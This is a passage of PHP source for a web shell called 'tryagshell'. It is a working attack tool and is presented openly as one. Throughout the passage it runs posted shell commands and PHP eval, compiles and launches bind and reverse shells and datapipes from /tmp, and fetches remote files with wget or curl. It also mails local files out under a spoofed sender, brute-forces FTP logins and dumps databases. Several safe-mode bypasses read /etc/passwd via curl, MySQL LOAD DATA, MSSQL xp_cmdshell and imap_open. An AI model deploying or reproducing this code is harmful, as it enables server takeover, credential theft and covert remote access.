1765 echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
1766 $id = ex('id');
1767 echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>"));
1768 echo ws(3).$dir;
1769 echo ws(3).'( '.perms(@fileperms($dir)).' )';
1770 echo "</b></font>";
1771 }
1772 else
1773 {
1774 echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
1775 echo "</td><td>";
1776 echo "<font face=Verdana size=-2 color=red><b>";
1777 echo ws(3).@substr(@php_uname(),0,120)."<br>";
1778 echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
1779 echo ws(3).@get_current_user()."<br>";
1780 echo ws(3).$dir;
1781 echo "<br></font>";
1782 }
1783 echo "</font>";
1784 echo "</td></tr></table>";
1785 $f = '<br>';
1786 if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail")
1787  {
1788  $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$POST['from']."\r\n");
1789  mr($language,$res);
1790  $_POST['cmd']="";
1791  }
1792 if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
1793  {
1794  if(!$file=@fopen($_POST['loc_file'],"r")) { echo re($_POST['loc_file']); $_POST['cmd']=""; }
1795  else
1796   {
1797     $filename = @basename($_POST['loc_file']);
1798     $filedump = @fread($file,@filesize($_POST['loc_file']));
1799     fclose($file);
1800     $content_encoding=$mime_type='';
1801     compress($filename,$filedump,$_POST['compress']);
1802     $attach = array(
1803                     "name"=>$filename,
1804                     "type"=>$mime_type,
1805                     "content"=>$filedump
1806                    );
1807     if(empty($_POST['subj'])) { $_POST['subj'] = 'file from tryagshell'; }
1808     if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
1809     $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
1810     mr($language,$res);
1811     $_POST['cmd']="";
1812   }
1813  }
1814 if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
1815 {
1816 $_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
1817 }
1818 if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
1819  {
1820  switch($_POST['what'])
1821    {
1822    case 'own':
1823    @chown($_POST['param1'],$_POST['param2']);
1824    break;
1825    case 'grp':
1826    @chgrp($_POST['param1'],$_POST['param2']);
1827    break;
1828    case 'mod':
1829    @chmod($_POST['param1'],intval($_POST['param2'], 8));
1830    break;
1831    }
1832  $_POST['cmd']="";
1833  }
1834 if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
1835  {
1836    switch($_POST['what'])
1837    {
1838      case 'file':
1839       if($_POST['action'] == "create")
1840        {
1841        if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
1842        else {
1843         fclose($file);
1844         $_POST['e_name'] = $_POST['mk_name'];
1845         $_POST['cmd']="edit_file";
1846         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
1847         }
1848        }
1849        else if($_POST['action'] == "delete")
1850        {
1851        if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
1852        $_POST['cmd']="";
1853        }
1854      break;
1855      case 'dir':
1856       if($_POST['action'] == "create"){
1857       if(mkdir($_POST['mk_name']))
1858        {
1859          $_POST['cmd']="";
1860          echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
1861        }
1862       else { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
1863       }
1864       else if($_POST['action'] == "delete"){
1865       if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
1866       $_POST['cmd']="";
1867       }
1868      break;
1869    }
1870  }
1871 if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
1872  {
1873  if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
1874  if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; }
1875  else {
1876  echo $table_up3;
1877  echo $font;
1878  echo "<form name=save_file method=post>";
1879  echo ws(3)."<b>".$_POST['e_name']."</b>";
1880  echo "<div align=center><textarea name=e_text cols=121 rows=24>";
1881  echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
1882  fclose($file);
1883  echo "</textarea>";
1884  echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
1885  echo "<input type=hidden name=dir value=".$dir.">";
1886  echo "<input type=hidden name=cmd value=save_file>";
1887  echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
1888  echo "</div>";
1889  echo "</font>";
1890  echo "</form>";
1891  echo "</td></tr></table>";
1892  exit();
1893  }
1894  }
1895 if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
1896  {
1897  $mtime = @filemtime($_POST['e_name']);
1898  if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); }
1899  else {
1900  if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
1901  @fwrite($file,$_POST['e_text']);
1902  @touch($_POST['e_name'],$mtime,$mtime);
1903  $_POST['cmd']="";
1904  echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
1905  }
1906  }
1907 if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
1908 {
1909  cf("/tmp/bd.c",$port_bind_bd_c);
1910  $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
1911  @unlink("/tmp/bd.c");
1912  $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
1913  $_POST['cmd']="ps -aux | grep bd";
1914 }
1915 if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
1916 {
1917  cf("/tmp/bdpl",$port_bind_bd_pl);
1918  $p2=which("perl");
1919  if(empty($p2)) $p2="perl";
1920  $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
1921  $_POST['cmd']="ps -aux | grep bdpl";
1922 }
1923 if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
1924 {
1925  cf("/tmp/back",$back_connect);
1926  $p2=which("perl");
1927  if(empty($p2)) $p2="perl";
1928  $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
1929  $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
1930 }
1931 if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
1932 {
1933  cf("/tmp/back.c",$back_connect_c);
1934  $blah = ex("gcc -o /tmp/backc /tmp/back.c");
1935  @unlink("/tmp/back.c");
1936  $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
1937  $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
1938 }
1939 if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
1940 {
1941  cf("/tmp/dp",$datapipe_pl);
1942  $p2=which("perl");
1943  if(empty($p2)) $p2="perl";
1944  $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
1945  $_POST['cmd']="ps -aux | grep dp";
1946 }
1947 if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
1948 {
1949  cf("/tmp/dpc.c",$datapipe_c);
1950  $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
1951  @unlink("/tmp/dpc.c");
1952  $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
1953  $_POST['cmd']="ps -aux | grep dpc";
1954 }
1955 if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}}
1956 if (!empty($HTTP_POST_FILES['userfile']['name']))
1957 {
1958 if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
1959 else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
1960 @copy($HTTP_POST_FILES['userfile']['tmp_name'],
1961             $_POST['dir']."/".$nfn)
1962       or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
1963 }
1964 if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
1965 {
1966  switch($_POST['with'])
1967  {
1968  case wget:
1969  $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
1970  break;
1971  case fetch:
1972  $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
1973  break;
1974  case lynx:
1975  $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1976  break;
1977  case links:
1978  $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1979  break;
1980  case GET:
1981  $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1982  break;
1983  case curl:
1984  $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
1985  break;
1986  }
1987 }
1988 if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
1989  {
1990  list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
1991  if(empty($ftp_port)) { $ftp_port = 21; }
1992  $connection = @ftp_connect ($ftp_server,$ftp_port,10);
1993  if(!$connection) { fe($language,0); }
1994  else
1995   {
1996   if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { fe($language,1); }
1997   else
1998    {
1999    if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.(($windows)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);        }
2000    if($_POST['cmd']=="ftp_file_up")   { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);        }
2001    }
2002   }
2003  @ftp_close($connection);
2004  $_POST['cmd'] = "";
2005  }
2006 if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
2007  {
2008  list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
2009  if(empty($ftp_port)) { $ftp_port = 21; }
2010  $connection = @ftp_connect ($ftp_server,$ftp_port,10);
2011  if(!$connection) { fe($language,0); $_POST['cmd'] = ""; }
2012  else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
2013  @ftp_close($connection);
2014  }
2015 echo $table_up3;
2016 if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); }
2017 else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
2018 echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
2019 if($safe_mode)
2020 {
2021  switch($_POST['cmd'])
2022  {
2023  case 'safe_dir':
2024   $d=@dir($dir);
2025   if ($d)
2026    {
2027    while (false!==($file=$d->read()))
2028     {
2029      if ($file=="." || $file=="..") continue;
2030      @clearstatcache();
2031      list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
2032      if($windows){
2033      echo date("d.m.Y H:i",$mtime);
2034      if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
2035      }
2036      else{
2037      $owner = @posix_getpwuid($uid);
2038      $grgid = @posix_getgrgid($gid);
2039      echo $inode." ";
2040      echo perms(@fileperms($file));
2041      printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
2042      echo date("d.m.Y H:i ",$mtime);
2043      }
2044      echo "$file\n";
2045     }
2046    $d->close();
2047    }
2048   else echo $lang[$language._text29];
2049  break;
2050  case 'safe_file':
2051   if(@is_file($_POST['file']))
2052    {
2053    $file = @file($_POST['file']);
2054    if($file)
2055     {
2056     $c = @sizeof($file);
2057     for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); }
2058     }
2059    else echo $lang[$language._text29];
2060    }
2061   else echo $lang[$language._text31];
2062   break;
2063   case 'test1':
2064   $ci = @curl_init("file://".$_POST['test1_file']."");
2065   $cf = @curl_exec($ci);
2066   echo $cf;
2067   break;
2068   case 'test2':
2069   @include($_POST['test2_file']);
2070   break;
2071   case 'test3':
2072   if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
2073   $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
2074   if($db)
2075    {
2076    if(@mysql_select_db($_POST['test3_md'],$db))
2077     {
2078      $sql = "DROP TABLE IF EXISTS temp_tryag_table;";
2079      @mysql_query($sql);
2080      $sql = "CREATE TABLE `temp_tryag_table` ( `file` LONGBLOB NOT NULL );";
2081      @mysql_query($sql);
2082      $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_tryag_table;";
2083      @mysql_query($sql);
2084      $sql = "SELECT * FROM temp_tryag_table;";
2085      $r = @mysql_query($sql);
2086      while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
2087      $sql = "DROP TABLE IF EXISTS temp_tryag_table;";
2088      @mysql_query($sql);
2089     }
2090     else echo "[-] ERROR! Can't select database";
2091    @mysql_close($db);
2092    }
2093   else echo "[-] ERROR! Can't connect to mysql server";
2094   break;
2095   case 'test4':
2096   if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
2097   $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
2098   if($db)
2099    {
2100    if(@mssql_select_db($_POST['test4_md'],$db))
2101     {
2102      @mssql_query("drop table tryag_temp_table",$db);
2103      @mssql_query("create table tryag_temp_table ( string VARCHAR (500) NULL)",$db);
2104      @mssql_query("insert into tryag_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
2105      $res = mssql_query("select * from tryag_temp_table",$db);
2106      while(($row=@mssql_fetch_row($res)))
2107       {
2108       echo $row[0]."\r\n";
2109       }
2110     @mssql_query("drop table tryag_temp_table",$db);
2111     }
2112     else echo "[-] ERROR! Can't select database";
2113    @mssql_close($db);
2114    }
2115   else echo "[-] ERROR! Can't connect to MSSQL server";
2116   break;
2117   case 'test5':
2118   if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
2119   $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
2120   @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
2121   $lines = file ('/tmp/mb_send_mail');
2122   foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
2123   break;
2124   case 'test6':
2125   $stream = @imap_open('/etc/passwd', "", "");
2126   $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
2127   for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
2128   @imap_close($stream);
2129   break;
2130   case 'test7':
2131   $stream = @imap_open($_POST['test7_file'], "", "");
2132   $str = @imap_body($stream, 1);
2133   echo $str;
2134   @imap_close($stream);
2135   break;
2136  }
2137 }
2138 else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
2139  $cmd_rep = ex($_POST['cmd']);
2140  if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
2141  else { echo @htmlspecialchars($cmd_rep)."\n"; }}
2142 if ($_POST['cmd']=="ftp_brute")
2143  {
2144  $suc = 0;
2145  foreach($users as $user)
2146   {
2147   $connection = @ftp_connect($ftp_server,$ftp_port,10);
2148   if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
2149   else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
2150   @ftp_close($connection);
2151   }
2152  echo "\r\n-------------------------------------\r\n";
2153  $count = count($users);
2154  if(isset($_POST['reverse'])) { $count *= 2; }
2155  echo $lang[$language.'_text97'].$count."\r\n";
2156  echo $lang[$language.'_text98'].$suc."\r\n";
2157  }
2158 if ($_POST['cmd']=="php_eval"){
2159  $eval = @str_replace("<?","",$_POST['php_eval']);
2160  $eval = @str_replace("?>","",$eval);
2161  @eval($eval);}
2162 if ($_POST['cmd']=="mysql_dump")
2163  {
2164   if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
2165   $sql = new my_sql();
2166   $sql->db   = $_POST['db'];
2167   $sql->host = $_POST['db_server'];
2168   $sql->port = $_POST['db_port'];
2169   $sql->user = $_POST['mysql_l'];
2170   $sql->pass = $_POST['mysql_p'];
2171   $sql->base = $_POST['mysql_db'];
2172   if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
2173   else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
2174   else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
2175   else {
2176    if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
2177    else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
2178    else { echo "[-] ERROR! Can't write in dump file"; }
2179    }
2180  }
2181 echo "</textarea></div>";
2182 echo "</b>";
2183 echo "</td></tr></table>";
2184 echo "<table width=100% cellpadding=0 cellspacing=0>";
2185 function up_down($id)
2186  {
2187  global $lang;
2188  global $language;
2189  return '&nbsp<img src='.$_SERVER['PHP_SELF'].'?img=1 onClick="document.getElementById(\''.$id.'\').style.display = \'none\'; document.cookie=\''.$id.'=0;\';" title="'.$lang[$language.'_text109'].'"><img src='.$_SERVER['PHP_SELF'].'?img=2 onClick="document.getElementById(\''.$id.'\').style.display = \'block\'; document.cookie=\''.$id.'=1;\';" title="'.$lang[$language.'_text110'].'">';
2190  }
2191 function div($id)
2192  {
2193  if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">';
2194  return '<div id="'.$id.'">';
2195  }
2196 if(!$safe_mode){
2197 echo $fs.$table_up1.$lang[$language.'_text2'].up_down('id1').$table_up2.div('id1').$ts;
2198 echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
2199 echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2200 echo $te.'</div>'.$table_end1.$fe;
2201 }
2202 else{
2203 echo $fs.$table_up1.$lang[$language.'_text28'].up_down('id2').$table_up2.div('id2').$ts;
2204 echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
2205 echo $te.'</div>'.$table_end1.$fe;
2206 }
2207 echo $fs.$table_up1.$lang[$language.'_text42'].up_down('id3').$table_up2.div('id3').$ts;
2208 echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
2209 echo $te.'</div>'.$table_end1.$fe;
2210 echo $fs.$table_up1.$lang[$language.'_text777'].up_down('id3').$table_up2.div('id3').$ts;
2211 echo sr(15,"<b>".$lang[$language.'_text888'].$arrow."</b>",in('text','u1p',85,'/etc/passwd').in('hidden','cmd',0,'view_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
2212 echo $te.'</div>'.$table_end1.$fe;
2213 echo $fs.$table_up1.$lang[$language.'_text7777'].up_down('id3').$table_up2.div('id3').$ts;
2214 echo sr(15,"<b>".$lang[$language.'_text8888'].$arrow."</b>",in('text','Mohajer22',85,'/etc/passwd').in('hidden','cmd',0,'view_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
2215 echo $te.'</div>'.$table_end1.$fe;
2216 echo $fs.$table_up1.$lang[$language.'_text999'].up_down('id3').$table_up2.div('id3').$ts;
2217 echo sr(15,"<b>".$lang[$language.'_text9999'].$arrow."</b>","<select name=switch><option value=file>View file</option><option value=dir>View dir</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','string',60,(($_POST['string'])?($_POST['string']):("/etc/passwd"))).ws(2)."<b>".in('hidden','cmd',0,'view_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
2218 echo $te.'</div>'.$table_end1.$fe;
2219 echo $fs.$table_up1.$lang[$language.'_text1010'].up_down('id3').$table_up2.div('id3').$ts;
2220 echo sr(15,"<b>".$lang[$language.'_text101010'].$arrow."</b>","<select name=plugin><option>cat /etc/passwd</option><option>/bin/ls</option><option>tempnam</option><option>/tmp</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):(""))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):(""))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
2221 echo $te.'</div>'.$table_end1.$fe;
2222 if($safe_mode){
2223 echo $fs.$table_up1.$lang[$language.'_text57'].up_down('id4').$table_up2.div('id4').$ts;
2224 echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
2225 echo $te.'</div>'.$table_end1.$fe;
2226 }
2227 if($safe_mode && $unix){
2228 echo $fs.$table_up1.$lang[$language.'_text67'].up_down('id5').$table_up2.div('id5').$ts;
2229 echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2230 echo $te.'</div>'.$table_end1.$fe;
2231 }
2232 if(!$safe_mode){
2233 foreach ($aliases as $alias_name=>$alias_cmd)
2234  {
2235  $aliases2 .= "<option>$alias_name</option>";
2236  }
2237 echo $fs.$table_up1.$lang[$language.'_text7'].up_down('id6').$table_up2.div('id6').$ts;
2238 echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2239 echo $te.'</div>'.$table_end1.$fe;
2240 }
2241 echo $fs.$table_up1.$lang[$language.'_text54'].up_down('id7').$table_up2.div('id7').$ts;
2242 echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
2243 echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
2244 echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
2245 echo $te.'</div>'.$table_end1.$fe;
2246 if(!$safe_mode && $unix){
2247 echo $fs.$table_up1.$lang[$language.'_text76'].up_down('id8').$table_up2.div('id8').$ts;
2248 echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
2249 echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
2250 echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
2251 echo $te.'</div>'.$table_end1.$fe;
2252 }
2253 echo $fs.$table_up1.$lang[$language.'_text32'].up_down('id9').$table_up2.$font;
2254 echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>";
2255 echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"tryagshell.php\");\r\n//readfile(\"/etc/passwd\");"));
2256 echo "</textarea>";
2257 echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
2258 echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
2259 echo "</div></div></font>";
2260 echo $table_end1.$fe;
2261 if($safe_mode&&$curl_on)
2262 {
2263 echo $fs.$table_up1.$lang[$language.'_text33'].up_down('id10').$table_up2.div('id10').$ts;
2264 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2265 echo $te.'</div>'.$table_end1.$fe;
2266 }
2267 if($safe_mode)
2268 {
2269 echo $fs.$table_up1.$lang[$language.'_text34'].up_down('id11').$table_up2.div('id11').$ts;
2270 echo "<table class=table1 width=100% align=center>";
2271 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2272 echo $te.'</div>'.$table_end1.$fe;
2273 }
2274 if($safe_mode&&$mysql_on)
2275 {
2276 echo $fs.$table_up1.$lang[$language.'_text35'].up_down('id12').$table_up2.div('id12').$ts;
2277 echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
2278 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2279 echo $te.'</div>'.$table_end1.$fe;
2280 }
2281 if($safe_mode&&$mssql_on)
2282 {
2283 echo $fs.$table_up1.$lang[$language.'_text85'].up_down('id13').$table_up2.div('id13').$ts;
